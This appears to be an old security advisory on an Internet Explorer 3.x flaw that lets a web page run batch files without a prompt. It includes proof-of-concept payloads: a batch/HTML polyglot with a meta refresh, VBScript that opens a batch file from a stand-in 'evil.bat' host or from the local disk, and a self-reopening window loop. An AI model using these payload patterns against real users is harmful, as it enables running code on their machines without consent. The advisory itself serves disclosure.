COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    Systems running IE (guess who)

PROBLEM

    The following  was posted  to BoS.   This HTML  script should make
    MSIE run any .bat file.  Here comes script.

	http://foo.com/blah.bat

	-------------------------
	@echo "<html>" > nul
	@echo Insert Evil Command of the Week here!
	exit
	<meta http-equiv="refresh" content="0; url=w/blah.bat">
	@echo "</html>" > nul

    David  Litchfield  expanded  that  with  following  using VBScript
    (tested with IE 3.02).  The problem is caused by a VBScript:

<SCRIPT LANGUAGE="VBSCRIPT">
	WINDOW.OPEN("http://www.company.com/evil.bat")
</SCRIPT>

    This causes a new instance of  IE to open and the batch  file will
    be run.  What  is worrying is the  batch file does not  have to be
    stored locally.  It can be stored  on the Web server.  It is  then
    downloaded and run on the local  machine.  IE does not prompt  the
    user with any security warnings.  It just goes ahead and runs  the
    batch file..."evil" commands 'n' all.  This same VBScript can also
    be used to run  batch files that are  stored locally by using  the
    following:

	WINDOW.OPEN("FILE://C:/AUTOEXEC.BAT")

    Also, has anyone ever considered the  following VBScript  (call it
    wintest.htm):

    <BODY LANGUAGE="VBSCRIPT" ONUNLOAD ="RELOAD">
    <SCRIPT LANGUAGE="vbscript">

	    WINDOW.OPEN "WINTEST.HTM" , "WINDOW" , "TOOLBAR=NO"

	    SUB RELOAD

		    WINDOW.OPEN ("WINTEST.HTM")

	    END SUB

    </SCRIPT>

SOLUTION

    I think IE  4.0 is smarter.   In normal installation  of IE4.x  it
    ASKS what do you  want to do with  that BATCH file -  ie. it never
    runs it without asking.   It is standard behaviour for  many, many
    files to  ask what  to do  with them  - and  BAT/EXE/COM are  such
    files.